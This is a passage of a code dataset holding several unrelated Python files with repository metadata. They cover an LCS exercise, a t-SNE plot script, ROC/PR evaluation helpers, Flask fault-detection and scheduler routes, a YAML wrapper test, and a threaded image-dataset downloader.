return 0\n#\n# if (n, m) in memoized_map:\n# print('here...')\n# return memoized_map[(n, m)]\n# # print(memoized_map)\n# if s1[n - 1] == s2[m - 1]:\n# memoized_map[(n, m)] = 1 + memoized_LCS(s1, s2, n - 1, m - 1)\n# return memoized_map[(n, m)]\n# else:\n# memoized_map[(n, m)] = max(memoized_LCS(s1, s2, n, m - 1), memoized_LCS(s1, s2, n - 1, m))\n# return memoized_map[(n, m)]\n\n\n# Memoized approach\ndef memoized_LCS():\n \"\"\"\n s1: string 1\n s2: string 2\n n: len(s1)\n m: len(s2)\n \"\"\"\n memoized_map = {}\n\n def LCS_cal(s1, s2, n, m):\n\n # base condition (Think of the smallest valid input)\n if n == 0 or m == 0:\n # if any of the string is empty then nothing will be common, so return 0\n return 0\n\n if (n, m) in memoized_map:\n # print('here...')\n return memoized_map[(n, m)]\n # print(memoized_map)\n if s1[n - 1] == s2[m - 1]:\n memoized_map[(n, m)] = 1 + LCS_cal(s1, s2, n - 1, m - 1)\n return memoized_map[(n, m)]\n else:\n memoized_map[(n, m)] = max(LCS_cal(s1, s2, n, m - 1), LCS_cal(s1, s2, n - 1, m))\n return memoized_map[(n, m)]\n\n return LCS_cal\n\n\ndef top_down_LCS(s1, s2, n, m):\n # matrix of (n + 1) * (m + 1)\n t = [[None for i in range(m + 1)] for j in range(n + 1)]\n for i in range(n + 1):\n for j in range(m + 1):\n if i == 0 or j == 0:\n t[i][j] = 0\n\n for i in range(1, n + 1):\n for j in range(1, m + 1):\n if s1[i - 1] == s2[j - 1]:\n t[i][j] = 1 + t[i - 1][j - 1]\n else:\n t[i][j] = max(t[i][j - 1], t[i - 1][j])\n\n print(t)\n return t[i][j]\n\n\ns1 = \"aacabdkacaa\"\ns2 = s1[::-1]\n\nprint(LCS(s1, s2, len(s1), len(s2)))\n# print(memoized_LCS(s1, s2, len(s1), len(s2)))\nmemoized_fun = memoized_LCS()\nprint(memoized_fun(s1, s2, len(s1), len(s2)))\n\nprint(top_down_LCS(s1, s2, len(s1), len(s2)))\n","repo_name":"H1m2n/data-structures","sub_path":"dynamic_programming/longest_common_subsequences_variations/standrd_problem.py","file_name":"standrd_problem.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20630350873","text":"import abc\n\nclass PeopleFilterInterface(metaclass=abc.ABCMeta):\n @classmethod\n def __subclasshook__(cls, subclass):\n return (hasattr(subclass, 'detect_people') and \n callable(subclass.detect_people\n ) or \n NotImplemented)\n \n @abc.abstractmethod\n def detect_people(self, image)->list:\n raise NotImplementedError","repo_name":"nicoale777/IdentificacionDeOrdenes","sub_path":"services/people/PeopleFilterInterface.py","file_name":"PeopleFilterInterface.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24096313564","text":"\nimport matplotlib.pyplot as plt\n\nfrom ktsne import Ktsne\nfrom sklearn import datasets\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.utils import shuffle\n\n\n# iris = datasets.load_iris()\n# X = iris.data\n# y = iris.target\n\ndigits = datasets.load_digits()\nX = digits.data\ny = digits.target\n\n\nX, y = shuffle(X, y)\nX = X[:500]\ny = y[:500]\n\nscaler = MinMaxScaler(feature_range=(-1, 1))\n\nf_opts = {'p_degree': 2.0, 'p_dims': 12, 'eta': 25.0,\n 'perplexity': 50.0, 'n_dims': 2, 'ker': 'pca', 'gamma': 1.0}\n\nkernel = f_opts[\"ker\"]\n\nplt.clf()\n\n\nX1 = scaler.fit_transform(X)\n\nplt.subplot(2, 1, 1)\n# Plot the training points\nX_pca = PCA(n_components=2).fit_transform(X1)\nx_min, x_max = X_pca[:, 0].min() - .5, X_pca[:, 0].max() + .5\ny_min, y_max = X_pca[:, 1].min() - .5, X_pca[:, 1].max() + .5\n\nplt.scatter(X_pca[:, 0], X_pca[:, 1], c=y, cmap=plt.cm.Set1,\n edgecolor='k')\nplt.xlabel('p1')\nplt.ylabel('p2')\nplt.xlim(x_min, x_max)\nplt.ylim(y_min, y_max)\nplt.xticks(())\nplt.yticks(())\nplt.title(\" PCA without ktsne \")\n\n\nk_tsne = Ktsne(X1, f_opts=f_opts)\nX_reduced = k_tsne.get_solution(3000)\nX_reduced = scaler.fit_transform(X_reduced)\nplt.subplot(2, 1, 2)\n\nplt.scatter(X_reduced[:, 0], X_reduced[:, 1], c=y, cmap=plt.cm.Set1,\n edgecolor='k')\nx1_min, x1_max = X_reduced[:, 0].min() - .5, X_reduced[:, 0].max() + .5\ny1_min, y1_max = X_reduced[:, 1].min() - .5, X_reduced[:, 1].max() + .5\n\nplt.xlabel(' V1 ')\nplt.ylabel(' V2 ')\n\nplt.xlim(x1_min, x1_max)\nplt.ylim(y1_min, y1_max)\nplt.xticks(())\nplt.yticks(())\nplt.title(\"with ktsne %s kernel \" % kernel)\n\n\nplt.subplots_adjust(hspace=0.5)\nplt.show()\n","repo_name":"DanShai/kernalized-tsne","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"69879498372","text":"# import numpy as np\nfrom sklearn import metrics\nfrom sklearn.metrics import precision_recall_curve, average_precision_score\n\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\n\n\ndef evaluation(all_pred, all_labels, epoch):\n fpr, tpr, thresholds = metrics.roc_curve(np.array(all_labels), np.array(all_pred), pos_label=1)\n # np.savez('auc.npz', fpr=fpr, tpr=tpr, thresholds=thresholds)\n roc_auc = metrics.auc(fpr, tpr)\n return fpr, tpr, roc_auc\n\n\ndef plot_auc_curve(fpr, tpr, roc_auc, epoch):\n curve_dir = 'charts/auc/'\n if not os.path.exists(curve_dir):\n os.makedirs(curve_dir)\n auc_curve_file = os.path.join(curve_dir, 'auc_%02d.png' % (epoch))\n\n plt.title(f'Receiver Operating Characteristic at epoch: {epoch}')\n plt.plot(fpr, tpr, 'b', label='AUC = %0.2f' % roc_auc)\n plt.legend(loc='lower right')\n plt.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.savefig(auc_curve_file)\n plt.close()\n\n\ndef plot_pr_curve(all_labels, all_pred, epoch):\n pr_dir = 'charts/pr/'\n if not os.path.exists(pr_dir):\n os.makedirs(pr_dir)\n pr_curve_file = os.path.join(pr_dir, 'pr_%02d.png' % (epoch))\n precision, recall, thresholds = precision_recall_curve(np.array(all_labels), np.array(all_pred))\n # np.savez('ap_attention_bbox_flow.npz', precision=precision,\n # recall=recall, thresholds=thresholds)\n ap = average_precision_score(np.array(all_labels), np.array(all_pred))\n\n plt.title(f'Precision-Recall Curve at epoch: {epoch}')\n plt.plot(recall, precision, 'b', label='AP = %0.2f' % ap)\n plt.legend(loc='lower right')\n plt.xlim([0, 1])\n plt.ylim([0, 1])\n plt.ylabel('Precision')\n plt.xlabel('Recall')\n plt.savefig(pr_curve_file)\n plt.close()\n return ap\n\n\ndef frame_auc(output, labels):\n # print(output)\n output = np.array(output)\n labels = np.array(labels)\n # print(output)\n all_pred = []\n all_labels = []\n\n for t in range(len(output)):\n frame = output[t]\n frame_score = []\n frame_label = []\n print(frame)\n\n if len(frame) == 0:\n continue\n else:\n for j in range(len(frame)):\n score = np.exp(frame[j][:, 1])/np.sum(np.exp(frame[j]), axis=1)\n frame_score.append(score)\n frame_label.append(labels[t][j]+0)\n all_pred.append(max(frame_score))\n all_labels.append(sum(frame_label))\n\n new_labels = []\n for i in all_labels:\n if i > 0.0:\n new_labels.append(1.0)\n else:\n new_labels.append(0.0)\n\n fpr, tpr, thresholds = metrics.roc_curve(np.array(new_labels), np.array(all_pred), pos_label=1)\n roc_auc = metrics.auc(fpr, tpr)\n\n return roc_auc\n\n\n# def evaluation(all_pred,all_labels):\n# # cm = confusion_matrix(all_labels, all_pred, labels=['no-risk','risk'])\n# TPs = 0\n# TNs = 0\n# FPs = 0\n# FNs = 0\n# for pred,gt in zip(all_pred,all_labels):\n# if gt ==0:\n# if pred ==0:\n# TNs+=1\n# elif pred==1:\n# FPs+=1\n# elif gt ==1:\n# if pred==0:\n# FNs+=1\n# elif pred ==1:\n# TPs+=1\n#\n# cm = ([TNs,FPs],[FNs,TPs])\n# if TPs == 0:\n# recall =0\n# precision = 0\n# accuracy = (TPs+TNs)/(TPs+TNs+FPs+FNs)\n# else:\n# recall = TPs/(TPs+FNs)\n# precision = TPs/(TPs+FPs)\n# accuracy = (TPs+TNs)/(TPs+TNs+FPs+FNs)\n# return cm, precision, recall, accuracy\n","repo_name":"monjurulkarim/risky_object","sub_path":"models/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"44"} +{"seq_id":"17716593812","text":"from flask import Flask, render_template, Response\nfrom flask import request\nimport json\nimport plotly\nfrom flask_cors import CORS\nfrom getopt import getopt, GetoptError\nfrom logging.handlers import RotatingFileHandler\nfrom flask.logging import default_handler\nimport os\nimport sys\nimport logging\nfrom data_processing import preprocessing, system_fault, fault_database\n\napp = Flask(__name__)\nCORS(app)\n\n# --------------------------------\n# Configuration\n# --------------------------------\n\nconfig_file = None\ntry:\n opts, args = getopt(sys.argv[1:], \"c:\", [\"config=\"])\n for opt, arg in opts:\n if opt in '-c, --config':\n config_file = arg\nexcept GetoptError:\n pass\nif not config_file:\n config_file = os.path.abspath(\n os.path.dirname(__file__) + os.sep + 'config' + os.sep + 'config.json')\n print('Assuming config file at: ' + config_file)\nif not os.path.exists(config_file):\n print('config file: ' + config_file + ' not found')\n exit(-1)\napp.config.from_json(config_file)\n\n# --------------------------------\n# Logger Settings\n# --------------------------------\n\nroot = logging.getLogger()\nroot.addHandler(default_handler)\n\nos.makedirs(app.config['LOG_DIR'], exist_ok=True)\nrotating_handler = RotatingFileHandler(app.config['LOG_DIR'] + os.sep + 'fault_detection.log',\n maxBytes=app.config['LOG_MAX_SIZE'],\n backupCount=app.config['LOG_MAX_FILES'])\nformatter = logging.Formatter('[%(asctime)s] %(levelname)s : %(message)s')\nrotating_handler.setFormatter(formatter)\nroot.addHandler(rotating_handler)\n\nif app.config['DEBUG']:\n root.setLevel(logging.DEBUG)\nelse:\n root.setLevel(logging.INFO)\n\nroot.info('Service faults_detection started')\nroot.info('Service faults_detection configuration file: ' + config_file)\nroot.info('Service faults_detection logs of reports: ' + app.config['LOG_DIR'])\n\n\n# --------------------------------\n# routes\n# --------------------------------\n\n@app.route('/get_sql_ids')\ndef get_sql_id_list():\n path = app.config['SQL_ID_DATA_DIR']\n sql_id_list = []\n try:\n file_sql_id = open(path)\n except FileNotFoundError as e:\n root.error(e, exc_info=True)\n return Response(\"file not found\", status=500, mimetype='text/xml')\n\n for line in file_sql_id:\n sql_id_list.append(line)\n\n graph_json = json.dumps(sql_id_list)\n return Response(graph_json, status=200, mimetype='application/json')\n\n\n@app.route('/plot', methods=['GET'])\ndef plot_sys_fault():\n root.debug(\" ========== plot started ========\")\n sql_id = request.args.get('sql_id', None)\n days_num = request.args.get('days_num', None)\n path_log = app.config['LOG_DATA_DIR']\n path_fault = app.config['FAULT_DATA_DIR']\n # check if we have enough data\n\n try:\n sql_stores_dict = preprocessing.get_preprocessed_data(days=int(days_num), path_file=path_log)\n except FileNotFoundError as e:\n root.error(e, exc_info=True)\n return Response(\"file not found\", status=500, mimetype='text/xml')\n\n if len(sql_stores_dict) == 0 or int(sql_id) not in sql_stores_dict.keys():\n logging.warning(\"Request not completed due to unavailability of data\")\n return Response(\"Data is not available in the specified days. Please increase the days number\", status=400,\n mimetype='text/xml')\n\n fig = creat_fig(sql_stores_dict, int(sql_id), path_fault)\n graph_json = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n root.info(\"plotting is finished\")\n root.debug(\" ========== plot finished ========\")\n return Response(graph_json, status=200, mimetype='application/json')\n\n\n@app.route('/')\ndef home():\n return render_template('sys-fault.html')\n\n\ndef creat_fig(sql_stores_dict, sql_id, path_fault):\n # configuration\n time_interval = app.config['TIME_INTERVAL']\n acceptance_rate = app.config['ACCEPTANCE_RATE']\n min_valid_pair_intervals = app.config['MIN_VALID_PAIR_INTERVAL']\n window_size = app.config['WINDOWS_SIZE_MOVING_AVERAGE']\n sql_id_plot = sql_stores_dict.copy()\n\n is_database_valid = False\n try:\n is_database_valid = fault_database.is_valid_database(time_interval, acceptance_rate, min_valid_pair_intervals,\n path_fault)\n except OSError as e:\n root.error(e, exc_info=True)\n\n # if the current configuration is matched with the data in fault.txt, we check the last_update and try to find the\n # faults after the last updated time\n if is_database_valid:\n root.info(\"Faults text file is valid. Start reading the faults from text file.\")\n last_database_update = fault_database.get_last_update(path_fault)\n sql_stores_dict = preprocessing.limit_sql_id(sql_stores_dict, last_database_update)\n\n # if we have new data after the last updated time in database\n if len(sql_stores_dict) != 0:\n root.info(\"Database is not updated. Start finding faults among new added data\")\n grouped_data = system_fault.group_by_minutes(sql_stores_dict, time_interval=time_interval)\n # detect the fault time intervals in the system\n sys_fault = system_fault.calculate_fault(grouped_data, acceptance_rate=acceptance_rate,\n min_valid_pair_intervals=min_valid_pair_intervals)\n # reading all faults from file\n sys_fault = fault_database.get_saved_faults(path_fault) + sys_fault\n else:\n sys_fault = fault_database.get_saved_faults(path_fault)\n else:\n root.warning(\"Database configuration is not valid\")\n root.info(\"Start processing all the data.\")\n grouped_data = system_fault.group_by_minutes(sql_stores_dict, time_interval=time_interval)\n # detect the fault time intervals in the system\n sys_fault = system_fault.calculate_fault(grouped_data, acceptance_rate=acceptance_rate,\n min_valid_pair_intervals=min_valid_pair_intervals)\n\n # show the graph on moving average\n moved_average = preprocessing.moving_average(sql_id_plot[sql_id], window_size=window_size)\n return system_fault.plot_sys_fault(moved_average, sql_id, sys_fault, time_interval=time_interval)\n\n\n@app.route('/get_info')\ndef get_info():\n root.debug(\" ========== get info started ========\")\n sql_id = request.args.get('sql_id', None)\n path_log = app.config['LOG_DATA_DIR']\n sql_stores = preprocessing.get_info_for_sql_id(path_log, 365, sql_id)\n last_date = sql_stores['date'][0]\n number_of_requests = preprocessing.get_number_of_requests_per_month(sql_stores['date'])\n ip_address = preprocessing.get_number_of_ip(sql_stores['date'], sql_stores['ip_address'])\n object_dict = {\"last_date\": last_date.strftime(\"%Y-%m-%d %H:%M:%S\"),\n \"ip_address\": ip_address,\n \"number_of_requests\": number_of_requests}\n graph_json = json.dumps(object_dict)\n root.debug(\" ========== get info finished ========\")\n return Response(graph_json, status=200, mimetype='application/json')\n\n\n@app.errorhandler(Exception)\ndef handle_exception(e):\n root.error(e, exc_info=True)\n return Response(\"Check the logs for more information on the error\", status=500, mimetype='text/xml')\n","repo_name":"alireza-mht/sys-fault-detection","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73299777734","text":"from flask import Blueprint, request\nfrom spooler_task import SpoolerTask\nimport traceback\n\nfrom util.service_utils import ServiceUtils\nfrom helpers.chains_helper import ChainsHelper\n\nfrom util.constants import MONGO_DB_COLLECTION_ORDERS, MONGO_DB_COLLECTION_HISTORICAL, MONGO_DB_COLLECTION_LOGS\nfrom services.chain_service import ChainService\nfrom services.process.scheduler_service import SchedulerService\n\n\nchains_routes = Blueprint('chains_routes', __name__, url_prefix='/api/chains')\nchain_service = None # Variable estática para almacenar el servicio de tareas\nscheduler_service = None # Variable estática para almacenar el servicio de scheduler\n\n\n@chains_routes.record\ndef initialize_service(state):\n \"\"\"\n El decorador @orders_routes.record es específico de Flask y se utiliza para registrar una función de configuración\n que se ejecuta cuando se registra el blueprint orders_routes.\n \"\"\"\n global chain_service, scheduler_service\n\n # Obtener la instancia de la conexión a MongoDB de la configuración de la aplicación\n mongo_db_connection = state.app.config.get('DATABASE')\n # Obtenemos el clinete de mongoDB para procesos transaccionales\n clientMongoDB = state.app.config.get('CLIENT')\n\n # Creo una instancia de la clase chain_service\n chain_service = ChainService(\n mongo_db_connection, MONGO_DB_COLLECTION_ORDERS, clientMongoDB)\n\n # Creo una instancia de la clase scheduler_service\n scheduler_service = SchedulerService(\n mongo_db_connection, MONGO_DB_COLLECTION_ORDERS, MONGO_DB_COLLECTION_HISTORICAL,\n MONGO_DB_COLLECTION_LOGS, clientMongoDB)\n\n\n@chains_routes.route('/', methods=['POST'])\ndef get_chains(order_id):\n try:\n chains = chain_service.get(order_id)\n\n positions = []\n for i, obj in enumerate(chains):\n obj[\"position\"] = i + 1\n positions.append(i+1)\n\n options = [item[\"name\"] for item in chains]\n options.append(\"exito\")\n options.append(\"error\")\n\n return ServiceUtils.success({\"data\": chains, \"options\": options, \"positions\": positions})\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/modify', methods=['POST'])\ndef modify_chain():\n try:\n param = request.get_json()\n order_id = param['order_id']\n chains = param['chains']\n\n chain_service.modify(order_id, chains)\n\n return get_chains(order_id)\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/params', methods=['POST'])\ndef params_job():\n try:\n param = request.get_json()\n order_id = param['order_id']\n job_id = param['job_id']\n\n response = chain_service.get_params(order_id, job_id)\n\n return ServiceUtils.success(response)\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/update_params', methods=['POST'])\ndef update_params():\n try:\n param = request.get_json()\n order_id = param['order_id']\n job_id = param['job_id']\n params = param['params']\n chain_service.update_params(order_id, job_id, params)\n\n return ServiceUtils.success({\"data\": {}})\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/history')\ndef history():\n try:\n response = scheduler_service.get_historical()\n # response.sort(key=lambda x: x['startDate'], reverse=True)\n return ServiceUtils.success({\"data\": response})\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/process/', methods=['POST'])\ndef process(order_id):\n values = {}\n try:\n spooler = SpoolerTask(scheduler_service)\n spooler.logger.info(\"Orden a procesar \" + order_id)\n spooler.get_order(order_id)\n\n values = ChainsHelper.create_record(\n order_id, spooler.current_job, spooler.log_name)\n\n id = scheduler_service.add_historical(values)\n\n spooler.process()\n\n process_record(spooler.logger, values, \"SUCCESS\")\n\n return ServiceUtils.success({})\n except Exception as e:\n trace = traceback.format_exc()\n print(f\"Error.........................: {str(e)}\\n{trace}\")\n spooler.logger.error(\n f\"Error.........................: {str(e)}\\n{trace}\")\n\n process_record(spooler.logger, values, \"ERROR\")\n\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/log/', methods=['POST'])\ndef log_data(name):\n try:\n response = scheduler_service.get_logs(name)\n return ServiceUtils.success({\"data\": response})\n except Exception as e:\n return ServiceUtils.error(e)\n\n\ndef process_record(logger, values, type):\n if type == \"SUCCESS\":\n values = ChainsHelper.update_record(values, \"exitoso\", \"success\")\n logger.info(\"Proceso termino exitosamente.\")\n else:\n values = ChainsHelper.update_record(values, \"fallido\", \"error\")\n logger.info(\"Proceso termino con error.\")\n scheduler_service.update_historical(values)\n\n handlers = logger.handlers[:]\n for handler in handlers:\n logger.removeHandler(handler)\n handler.close()\n\n\n@chains_routes.route('/delete_historical', methods=['POST'])\ndef delete_historical():\n try:\n scheduler_service.delete_all_historical()\n return ServiceUtils.success({})\n except Exception as e:\n return ServiceUtils.error(e)\n\n\n@chains_routes.route('/delete_logs', methods=['POST'])\ndef delete_logs():\n try:\n scheduler_service.delete_all_logs()\n return ServiceUtils.success({})\n except Exception as e:\n return ServiceUtils.error(e)\n","repo_name":"wlopera/task-scheduler-python","sub_path":"routes/chains_routes.py","file_name":"chains_routes.py","file_ext":"py","file_size_in_byte":5717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24998846227","text":"import os\nimport inspect\nimport yaml\nfrom jon.jon_wrapper import JONFactory\n\nscript_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\n\n\ndef test_simple_manifest():\n with open(script_dir + '/k8s_simple_manifest.yml', 'r') as stream:\n try:\n d = yaml.safe_load(stream)\n json_obj2 = JONFactory.wrap(d)\n\n assert json_obj2.kind == 'Deployment'\n assert json_obj2.metadata.labels.app == 'consumer'\n assert json_obj2.spec.template.spec.containers[0].image == 'emmerson/cdi-rabbit-consumer:1.1.0'\n\n except yaml.YAMLError as e:\n print(e)\n\n\ndef test_multiple_manifest():\n with open(script_dir + '/k8s_manifests.yml', 'r') as stream:\n try:\n docs = yaml.safe_load_all(stream)\n all = [JONFactory.wrap(doc) for doc in docs]\n assert len(all) == 10\n assert all[0].metadata.name == 'consumer-configmap'\n assert all[0].data.RABBIT_HOST == 'rabbitmq'\n assert all[1].metadata.name == 'producer-configmap'\n\n assert all[2].kind == 'Service'\n assert all[2].metadata.labels.app == 'rabbitmq'\n except yaml.YAMLError as e:\n print(e)\n\n","repo_name":"Emmerson-Miranda/javascript-object-notation","sub_path":"tests/test_yml_wrapper.py","file_name":"test_yml_wrapper.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"5773575023","text":"import os\nimport concurrent.futures as cf\nimport re\n\nfrom io import BytesIO\n\nimport imageio\nfrom PIL import Image\nimport urllib\nimport requests\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torchvision.transforms as transforms\n\nfrom tqdm import tqdm, trange\n\n\n# Function extracts the image from a GIF URL that is provided in the parameter\n# This is done by extracting the first frame from the image\ndef extract_img_from_gif(img_url):\n pil_img = Image.open(urllib.request.urlopen(img_url))\n pil_img.seek(0)\n rgb_img = pil_img.convert(\"RGB\")\n pil_img.close()\n \n return np.array(rgb_img)\n\n\n# Function fetches both GIFs and other image typed from the links declared.\n# After fetching, they are pre-processed accordingly with regard to image type.\ndef extract_img(img_url):\n img_np = None\n not_fetched = False\n try:\n # naively look for GIFs\n from_url = requests.get(img_url, stream=True, timeout=10)\n # img = imageio.imread(imageio.core.urlopen(img_url).read())\n img = imageio.imread(BytesIO(from_url.raw.read()))\n if (img.shape[2] == 4):\n img_np = extract_img_from_gif(img_url) # get the fist frame of GIF\n else:\n img_np = img\n except Exception as exc:\n # Image is probably now a dead link or requires authentication to access\n # print(exc)\n not_fetched = True\n \n if not_fetched:\n return None\n # Make sure that the image is set up in that, the width is always longer than\n # the height.\n # This means rotating the image is need be\n img_tensor = torch.from_numpy(img_np.copy())\n img_tensor = img_tensor.permute(2, 0, 1)\n if img_tensor.shape[1] > img_tensor.shape[2]:\n img_tensor = img_tensor.permute(0, 2, 1)\n \n np_img = transforms.Resize((100, 100))(img_tensor).detach().numpy()\n\n return np_img\n\n\n\ndef populate_dataset(dataset_type):\n save_location = f\"data/processed-data/{dataset_type}\"\n train_csv = pd.read_csv(f\"{save_location}/train.csv\")\n test_csv = pd.read_csv(f\"{save_location}/test.csv\")\n\n training_dataset_imgs = []\n training_dataset_out = []\n evaluation_dataset_imgs = []\n evaluation_dataset_out = []\n\n for i in tqdm(range(len(train_csv))):\n np_img = extract_img(train_csv.iloc[i][\"img_link\"])\n eig_val = np.eye(2)[train_csv.iloc[i][\"is_explicit\"]]\n \n # make sure that the images are actually fetched and no error occurred while fetching images\n if np_img is not None:\n training_dataset_imgs.append(np.array(np_img))\n training_dataset_out.append(eig_val)\n\n for i in tqdm(range(len(test_csv))):\n np_img = extract_img(test_csv.iloc[i][\"img_link\"])\n eig_val = np.eye(2)[test_csv.iloc[i][\"is_explicit\"]]\n \n # make sure that the images are actually fetched and no error occurred while fetching images\n if np_img is not None:\n evaluation_dataset_imgs.append(np_img)\n evaluation_dataset_imgs.append(eig_val)\n \n # create dataset tuples\n training_set = (training_dataset_imgs, training_dataset_out)\n evaluation_set = (evaluation_dataset_imgs, evaluation_dataset_out)\n\n save_dataset(dataset_type, training_set, evaluation_set)\n\n\ndef save_arr(location, dataset):\n \"\"\"\n Saves the dataset in the specified location\n location: specific absolute location the data will be saved\n dataset: np.array that is being saved\n \"\"\"\n with open(location, \"wb\") as target_file:\n np.save(target_file, dataset)\n\n\ndef save_dataset(dataset_type, train, test):\n save_location = f\"data/processed-data/{dataset_type}\"\n train_imgs_location = f\"{save_location}/train-imgs.npy\"\n train_out_location = f\"{save_location}/train-out.npy\"\n test_imgs_location = f\"{save_location}/test-imgs.npy\"\n test_out_location = f\"{save_location}/test-out.npy\"\n\n \n # training set\n save_arr(train_imgs_location, train[0]) # save the training images\n save_arr(train_out_location, train[1]) # save the training images\n\n # training set\n save_arr(test_imgs_location, test[0]) # save the training images\n save_arr(test_out_location, test[1]) # save the training images\n\n\ndef save_segment(upper_bound, dataset_type, segment_type, segment_dataset):\n \"\"\"\n upper_bound (int): This is the last number in the longer list of images that is extracted by this func\n dataset_type: \"50-50, 70-30, 80-20, 90-10\" based on the current type that is being downloaded\n segment_type: \"train | test\" based on the dataset type\n sample_imgs: these is a list of numoy arrays of the corresponding images of the segment\n sample_outs: thesea are the corresponding correct outputs of the images\n \"\"\"\n img_save_location = f\"data/processed-data/{dataset_type}/{segment_type}-{upper_bound}-img.npy\"\n out_save_location = f\"data/processed-data/{dataset_type}/{segment_type}-{upper_bound}-out.npy\"\n\n save_arr(img_save_location, segment_dataset[0])\n save_arr(out_save_location, segment_dataset[1])\n\n\ndef populate_segments(upper_bound, dataset_type, segment_type, segment):\n \"\"\"\n upper_bound (int): This is the last number in the longer list of images that is extracted by this func\n dataset_type: \"50-50, 70-30, 80-20, 90-10\" based on the current type that is being downloaded\n segment_type: \"train | test\" based on the dataset type\n segment: this is the sub segment of the list that is being operated on\n \"\"\"\n imgs = []\n outs = []\n\n for i in trange(len(segment), desc=f\"{dataset_type}: {segment_type} Segment from {upper_bound - 499} - {upper_bound}\"):\n img_arr = extract_img(segment.iloc[i][\"img_link\"])\n\n if img_arr is not None:\n imgs.append(img_arr)\n outs.append(np.eye(2)[segment.iloc[i][\"is_explicit\"]])\n \n segment_dataset = (np.array(imgs), np.array(outs))\n save_segment(upper_bound, dataset_type, segment_type, segment_dataset)\n\n return f\"{upper_bound - 499} - {upper_bound} completed\"\n\n\ndef download_images(dataset_split_type, data_csv, dataset_type):\n # Download training images\n thread_pool = []\n with cf.ThreadPoolExecutor() as download_executor:\n # train set\n i = 0\n while i + 500 <= len(data_csv):\n i += 500 # create the upperbound\n\n executor = download_executor.submit(\n populate_segments, # function\n i - 1, # upperbound\n dataset_split_type, # dataset split type\n dataset_type, # type of the dataset being created\n data_csv.iloc[(i -500): i], # segmenting to the section being worked on\n )\n\n thread_pool.append(executor)\n \n # download the final segment that may not be in reach by the upper while loop\n if (len(data_csv) % 500) > 0:\n i += 500\n executor = download_executor.submit(\n populate_segments, # function\n i - 1, # upperbound\n dataset_split_type, # dataset split type\n dataset_type, # type of the dataset being created\n data_csv.iloc[(i -500): len(data_csv)], # segmenting to the section being worked on\n )\n\n thread_pool.append(executor)\n\n for executor in cf.as_completed(thread_pool):\n try:\n if executor.exception():\n print(executor.exception())\n except:\n pass\n\n\ndef assemble_dataset(dataset_split_type, train_csv_len, test_csv_len, train_assembled, test_assembled):\n assembly_folder = f\"data/processed-data/{dataset_split_type}\"\n \n def assemble(dataset_type, data_type, dataset_len):\n \"\"\"\n This is is a helper function to assemble the data based on\n dataset_type: this is either train or test data\n data_type: this is either img data or out (expected output) data\n dataset_len: this is the lenght of the combined csv that contained the urls\n \"\"\"\n floored_upper = int(dataset_len / 500) * 500 # get all the expected segment numbers\n upper = 0\n if floored_upper < dataset_len:\n upper = floored_upper + 500\n else:\n upper = floored_upper\n \n combined_dataset = [] # will contain all the np arrays combined\n segment_files = [] # append all the segment files here\n\n i = 0 # monitoring counter\n while i + 500 <= upper: # fetch all the files part of the segmenting\n i += 500\n segment_files.append(f\"{dataset_type}-{i - 1}-{data_type}.npy\")\n \n # assemble\n for segment_file in segment_files:\n with open(f\"{assembly_folder}/{segment_file}\", \"rb\") as opened_file:\n np_data = np.load(opened_file)\n combined_dataset.extend(np_data[:]) # get all as an array\n \n with open(f\"{assembly_folder}/{dataset_type}-{data_type}.npy\", \"wb\") as target_file:\n np.save(target_file, np.array(combined_dataset))\n\n print(\"Purging segment files...\")\n for segment_file in tqdm(segment_files):\n try:\n os.remove(f\"{assembly_folder}/{segment_file}\")\n except:\n pass\n \n executor_thread_pool = []\n \n # train dataset\n with cf.ThreadPoolExecutor() as export_executor:\n if not train_assembled:\n print(f\"Assembling {dataset_split_type} train dataset\")\n executor_thread_pool.append(export_executor.submit(assemble, \"train\", \"img\", train_csv_len))\n executor_thread_pool.append(export_executor.submit(assemble,\"train\", \"out\", train_csv_len))\n\n if not test_assembled:\n print(f\"Assembling {dataset_split_type} test dataset\")\n executor_thread_pool.append(export_executor.submit(assemble, \"test\", \"img\", test_csv_len))\n executor_thread_pool.append(export_executor.submit(assemble, \"test\", \"out\", test_csv_len))\n \n # wait for completion and get all the exceptions if there exists any\n for executor_thread in cf.as_completed(executor_thread_pool):\n try:\n if executor_thread.exception():\n print(executor_thread.exception())\n except:\n pass\n\n\ndef attempt_recovery(dataset_split_type, dataset_type):\n \"\"\" Triggers recovery protocol to prevent image redownload\n\n Triggers recovery protocol to find the progress achieved by the previous download session.\n Top prevent redownload of already downloaded images. Scans through looking for upperbounds\n that have been acheived.\n\n Once the iundownloaded segments are found, redownload commences for only those segments\n\n Args:\n dataset_split_type: specifies which folder to look into based on how the dataset is split\n \"\"\"\n 